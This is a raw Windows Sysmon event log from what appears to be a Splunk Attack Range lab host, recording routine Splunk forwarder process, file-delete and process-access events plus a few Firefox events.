AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:40.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA38C07D0A01D84EA9D405F5923DEB86,SHA256=86CBC8B47EBABBABBAEEB01021F3305D7B7294F77B951C5120BB106C654F1C0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.647{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D96ADF67F42D9B82A8EDBD65889FE78,SHA256=1DC9FFD7733F3792F3C14F9F7CC4CBDB6348FE968727047C5DEC3658CDBA3A8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.647{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F200829711ED079153C0D4ECB4D0E0E,SHA256=9E181F755E22723614FD73E1CB0320CDF9F8D7753E4B9D46B7400643DEF049B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.478{B81B27B7-82DD-613A-BB96-03000000C801}54802956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA0FD91999CAEC041C9784E642113523,SHA256=4DC5BD3035C7B5E60D88034C03384F54987A533973035B98AA64F805C0BB5D26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.332{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82DD-613A-BB96-03000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.332{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.332{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.332{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.332{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.332{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-82DD-613A-BB96-03000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.332{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82DD-613A-BB96-03000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:41.317{B81B27B7-82DD-613A-BB96-03000000C801}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035127823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:07.327{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62075-false10.0.1.12-8000- 23542300x800000000000000035127822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.415{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77B5117C0B02375D46B39F9DDF55B741,SHA256=7984326E1D483435BB4568178CDAF0FBAA913D4627318A1420896F25B19548E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.016{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82DE-613A-BC96-03000000C801}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.016{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.016{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.016{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.016{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.016{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-82DE-613A-BC96-03000000C801}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.016{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82DE-613A-BC96-03000000C801}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:42.005{B81B27B7-82DE-613A-BC96-03000000C801}1052C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:43.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0A95508C5D6093281F2F173DAD1C193,SHA256=6A8C4165DB847F8F233AACDB26726CDC6B5669B9F2756D094FA1449FE8DD458A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:43.014{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D96ADF67F42D9B82A8EDBD65889FE78,SHA256=1DC9FFD7733F3792F3C14F9F7CC4CBDB6348FE968727047C5DEC3658CDBA3A8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:44.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32B868EBADF15D79B7E74E429BD1E386,SHA256=B8D38A0E6E973D22636483F7B35544BC626C7D31CB11D9150397747578501E39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:44.398{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a47|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035127830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:44.398{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419b2|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035127829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:44.398{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f 10341000x800000000000000035127828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:44.398{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+141997|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 23542300x800000000000000035127827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:44.398{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF724d6af9.TMPMD5=80D2028940892EB0B825AD2D8C8015CA,SHA256=4DD349D08FFD72024F455B053513402E406D7132CA573412DC85EEBC52CFD7A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:44.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 